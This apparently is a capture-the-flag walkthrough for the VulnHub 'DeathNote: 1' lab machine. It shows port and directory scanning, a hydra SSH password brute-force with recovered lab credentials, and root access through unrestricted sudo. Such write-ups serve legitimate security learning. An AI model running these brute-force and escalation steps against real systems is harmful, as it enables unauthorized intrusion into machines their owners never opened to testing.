VulnHub: DeathNote: 1
Today we will take a look at Vulnhub: DeathNote. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
Command: Command: sudo nmap -p- -sV -sC -oN nmap/open — open 192.168.0.109
- Web pages
If there is such a problem when looking at the page, do it
Command: sudo nano /etc/hosts
Let’s take notes of everything you need on the page. (name, weird sentence, everything we will use)
If we press the hint button, we will come across a sentence.
L’s comment is below. let’s note
my fav line is
Find Site Directories
Command: Command: gobuster dir -u http://192.168.0.109 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt
Let’s look at the robots.txt extension
We found a new directory.
.jpg file may be damaged. Let’s download.
Command: wget http://deathnote.vuln/important.jpg
Command: cat important.jpg
Indicates that the password will be in the Indian button on the site. So the password is ‘iamjustic3’
The entry can also be ‘kira’ or ‘l’. Let’s check.
user: kira pass: iamjustic3
There is such a .txt file on the media page.
They look like a password. Let’s mark it as pass.txt.
Let’s add them to User.txt.
Let’s attack ssh.
Command: hydra -L user.txt -P pass.txt ssh://192.168.0.109 -V -t 4
user- l pass- death4me
Command: ssh firstname.lastname@example.org
it was brainfuck
Brainfuck/Text/Ook! obfuscator - deobfuscator. Decode and encode online.
The /opt folder also has hints that will be useful to us
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
Command: su kira
Let’s decode in cyberchef again
Let’s look at the / var folder
Command: cd /var
Commdn: cat misa
it is toooo late for misa
let’s check the privileges
Command: sudo -l
(ALL : ALL) ALL
This means that we have authority over everything. Let’s root
Command: sudo su
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”